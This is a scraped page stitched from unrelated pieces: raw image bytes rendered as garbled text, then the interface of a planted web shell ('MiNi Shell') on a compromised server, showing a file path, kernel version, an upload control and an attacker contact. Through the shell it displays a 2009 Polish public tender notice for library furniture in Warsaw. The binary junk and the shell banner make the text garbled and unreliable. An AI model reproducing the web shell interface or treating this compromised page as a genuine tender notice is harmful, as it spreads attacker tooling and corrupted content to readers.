JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090721/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090721/247466-N-2009.html

<p class="kh_header"><b>Warszawa: Dostawa i montaż wyposażenia meblowego i pozostałego
oraz elementów aranżacji wnętrz i reklamy
do Pedagogicznej Biblioteki Wojewódzkiej im. Komisji Edukacji Narodowej 
w Warszawie ul. Gocławska 4</b><br>
<b>Numer ogłoszenia: 247466 - 2009; data zamieszczenia: 21.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Pedagogiczna Biblioteka Wojewódzka im. Komisji Edukacji Narodowej w Warszawie , ul. Smyczkowa 14, 02-678 Warszawa, woj. mazowieckie, tel. 022 8530066, faks 022 8530066.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pbw.waw.pl.</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Biblioteka.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż wyposażenia meblowego i pozostałego
oraz elementów aranżacji wnętrz i reklamy
do Pedagogicznej Biblioteki Wojewódzkiej im. Komisji Edukacji Narodowej 
w Warszawie ul. Gocławska 4.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest:
Dostawa i montaż wyposażenia meblowego  i pozostałego:
1.1.	siedziska,
1.2.	meble i regały biblioteczne,
1.3.	elementy systemu wystawienniczego,
1.4.	dodatkowe elementy wyposażenia,

oraz elementów aranżacji wnętrz i reklamy;
1.5.	rolety zaciemniające,
1.6.	fototapety,
1.7.	kanały wentylacyjne wyklejane materiałem dekoracyjnym,
1.8.	dekoracje szyb,
1.9.	elementy systemu identyfikacji wizualnej

 do Pedagogicznej Biblioteki Wojewódzkiej im. Komisji Edukacji Narodowej               w Warszawie ul. Gocławska 4:
zgodnie ze  Szczegółowym opisem przedmiotu zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2, 39.13.11.00-0, 79.93.10.00-9, 22.46.20.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Wykonawca jest zobowiązany do wniesienia wadium w wysokości 20.000 PLN (słownie:  dwadzieścia tysięcy złotych).
2.	Wadium musi być wniesione przed upływem terminu składania ofert. W przypadku wniesienia  wadium w pieniądzu, należy wpłacić je na konto zlokalizowane w PKO SA  numer konta:40 1240 6003 1111 0010 2561 6160. Zamawiający uzna, że zostało ono wniesione w terminie, jeżeli w momencie upływu terminu do składania ofert wadium będzie znajdowało się na koncie Zamawiającego.
3.	  Wadium musi obejmować cały okres związania ofertą.
4.	  Wadium wniesione w pieniądzu, Zamawiający przechowuje na rachunku bankowym. 
5.	Wykonawca, który nie wniesie wadium w wysokości określonej w pkt.1, w formie lub formach dopuszczonych w Pzp., zostanie wykluczony z postępowania.
6.	  Zamawiający dokona niezwłocznie zwrotu wadium, jeżeli:
1)	upłynie termin związania ofertą;
2)	zostanie zawarta umowa i wniesione zabezpieczenie należytego wykonania tej umowy;
3)	Zamawiający unieważni postępowanie, a protesty zostaną ostatecznie rozstrzygnięte lub upłynie termin do ich wnoszenia.
7.	Zamawiający dokona niezwłocznie zwrotu wadium na pisemny wniosek Wykonawcy:
1)	który wycofał ofertę przed upływem terminu do składania ofert;
2)	który został wykluczony z postępowania;
3)	którego oferta została odrzucona.
8.	 Złożenie wniosku o zwrot wadium jest równoznaczne ze zrzeczeniem się prawa do  wniesienia  protestu.
9.	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
10.	Wykonawca, którego oferta zostanie wybrana, utraci wadium wraz z odsetkami na rzecz Zamawiającego, w przypadku gdy:
1)	odmówi podpisania umowy na warunkach określonych w ofercie;
2)	zawarcie umowy w sprawie niniejszego zamówienia stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy.
11. Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na  	wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o 	których mowa w art. 25 ust.1 lub pełnomocnictw, chyba, że udowodni, że wynika to z 	przyczyn nieleżących po jego stronie.
12.	Jeżeli Wykonawca wnosi wadium w formie gwarancji bankowej lub gwarancji 	  		ubezpieczeniowej, z treści tych gwarancji musi w szczególności jednoznacznie wynikać:
1)	  zobowiązanie gwaranta (banku, zakładu ubezpieczeń) do zapłaty całej kwoty wadium nieodwołalnie i bezwarunkowo na pierwsze żądanie Zamawiającego (beneficjenta gwarancji), które będzie zawierać oświadczenie, że zaistniały okoliczności, o których mowa w pkt.10, bez potwierdzania tych okoliczności;
2)	  termin obowiązywania gwarancji, który nie może być krótszy, niż termin związania
      ofertą.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia publicznego  mogą się ubiegać Wykonawcy którzy:
a) posiadają uprawnienia  do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
b) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym      i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
d) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Krajowy Rejestr Sądowy firmy lub/i inne odpowiednie dokumenty (podmiot mający siedzibę lub miejsce zamieszkania na terenie Rzeczypospolitej)/jeżeli ofertę składa podmiot mający siedzibę lub miejsce zamieszkania poza terenem Rzeczypospolitej podmiot ten składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające że nie otwarto jego likwidacji ani nie ogłoszono jego upadłości ( dokument ma być wystawiony nie wcześniej niż na 6 miesięcy przed upływem terminu składania ofert ) - kserokopia poświadczona za zgodność   z oryginałem.
2.	Oświadczenie o niepodleganiu wykluczeniu wykonawcy z przetargu zgodnie z art. 22     i 24 Pzp - Formularz nr 2 - oryginał.
       3.	Zaświadczenie z Urzędu Skarbowego (podmiot mający siedzibę lub miejsce zamieszkania na terenie Rzeczypospolitej)/jeżeli ofertę składa podmiot mający siedzibę lub miejsce zamieszkania poza terenem Rzeczypospolitej, podmiot ten składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie zalega z uiszczeniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne, z wyjątkiem przypadków, gdy uzyskał przewidziane prawem zwolnienie, odroczenie, rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji  właściwego organu ( dokument ma być wystawiony nie wcześniej niż na 3 miesiące  przed upływem terminu składania ofert ) - kserokopia poświadczona za zgodność   z oryginałem);
       4.	Zaświadczenie z Zakładu Ubezpieczeń Społecznych/Kasy Rolniczego Ubezpieczenia Społecznego (podmiot mający siedzibę lub miejsce zamieszkania na terenie Rzeczypospolitej)/jeżeli ofertę składa podmiot mający siedzibę lub miejsce zamieszkania poza terenem Rzeczypospolitej, podmiot ten składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie zalega z uiszczeniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne, z wyjątkiem przypadków, gdy uzyskał przewidziane prawem zwolnienie, odroczenie, rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu ( dokument ma być wystawiony nie wcześniej niż na 3 miesiące  przed upływem terminu składania ofert ) - kserokopia poświadczona za zgodność   z oryginałem);
       5.	Informacja z Krajowego Rejestru Karnego (członkowie władz i podmiot zbiorowy) - podmiot mający siedzibę lub miejsce zamieszkania na terenie Rzeczypospolitej/jeżeli ofertę składa podmiot mający siedzibę lub miejsce zamieszkania poza terenem Rzeczypospolitej, podmiot ten składa dokument lub 
	dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie orzeczono wobec niego zakazu ubiegania się o zamówienie ( dokument ma być wystawiony nie wcześniej niż na 6 miesięcy przed upływem terminu składania ofert ) - kserokopia poświadczona za zgodność   z oryginałem;
6.	Wykaz z dwóch ostatnich lat, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, minimum 2 dostaw  mebli biurowych o wartości minimum    600.000,00 zł brutto każda - Formularz nr 3 - oryginał.
7.	Potwierdzenia pisemne od podmiotów na rzecz, których dostawy zostały wykonane,     że dostawy, o których mowa w pkt. 2 zostały wykonane należycie - oryginały lub kserokopie poświadczone za zgodność  z oryginałem. Dokumenty mają zawierać,      co najmniej następujące informacje:
a) nazwę Wykonawcy;
b) nazwę odbiorcy;
c) datę rozpoczęcia  i zakończenia dostawy tj. miesiąc i rok;
d) wartość dostawy z podatkiem VAT;
g) stwierdzenie, że dostawa została wykonana należycie.
       8.  Opinia-informacja banku/spółdzielczej kasy oszczędnościowo-kredytowej o zdolności kredytowej Wykonawcy lub o posiadanych środkach finansowych. Opinia-informacja ma wykazywać, że dany podmiot posiada zdolność kredytową lub posiada środki finansowe na koncie w wysokości minimum 200.000,00 złotych ( dokument ma być wystawiony nie wcześniej niż na 3 miesiące  przed upływem terminu składania ofert ) - kserokopia poświadczona za zgodność   z oryginałem.
         9. Polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności -kwota ubezpieczenia - minimum 500.000,00 zł - kserokopia poświadczona               za zgodność   z oryginałem.
         10. Dowód wykazujący wniesienie wadium - jeżeli jest wniesione w formie innej niż        		w pieniądzu - oryginał. 

      Uwaga 1:
Dotyczy podmiotu mającego  siedzibę lub miejsce zamieszkania poza terenem Rzeczypospolitej - Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca  ma siedzibę lub miejsce zamieszkania, nie wydaje się  dokumentów,          o których mowa  w pkt. 1 należy zastąpić je dokumentami zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo 


samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
   
 Uwaga 2: 
 W przypadku podmiotu wspólnego, o którym mowa w art. 23 Pzp dokumenty,               wymienione w pkt.1- 5 ma złożyć każdy podmiot wchodzący w Jego skład. 

11. Ocena spełnienia warunków udziału w postępowaniu - ocena: 0 lub 1. W razie załączenia do oferty wszystkich dokumentów wskazanych w pkt 1 - 10 Zamawiający uzna, że Wykonawca spełnia wszystkie warunki udziału w postępowaniu.
12.Wykonawca, oprócz dokumentów wskazanych w pkt.1-10, załączy do oferty      	następujące dokumenty i materiały:
     		 1) wypełniony formularz oferty (formularz nr 1) - oryginał;
      		 2) wypełniony formularz cenowy (formularz nr 5) - oryginał;
	 3) w przypadku spółki z ograniczoną odpowiedzialnością należy do oferty dołączyć umowę spółki lub uchwałę wspólników zezwalającą Wykonawcy na zawarcie umowy, jeżeli wartość oferty przekracza dwukrotną wartość kapitału zakładowego spółki - art. 230 Kodeksu spółek handlowych (Dz. U. Nr 94, poz. 1037 ze zm.) - dotyczy tylko podmiotu, który ma siedzibę na terenie Rzeczpospolitej - kserokopia potwierdzona za zgodność z oryginałem.
         	4) Pełnomocnictwo do podpisania oferty (jeżeli dotyczy) w przypadku:
			a) gdy pełnomocnictwo ma formę  aktu notarialnego może być włączone do oferty         		  w formie kserokopii poświadczonej, 
         			 b) gdy pełnomocnictwo sporządzone jest w innej formie niż wskazana w pkt. 4) lit. a  	        ma być załączone do oferty w formie oryginału.
 	  5)  Modele siedzisk K1 i K5.
  	  6) Model konstrukcji regału R1.
   	  7) Próbka obicia siedziska K9.
        8) Próbki płyty meblowej..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pbw.waw.pl..<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba PBW Warszawa, ul. Smyczkowa 14 pokój 34.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.07.2009 godzina 10:00, miejsce: Siedziba PBW Warszawa ul. Smyczkowa 14 pokój nr 34..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com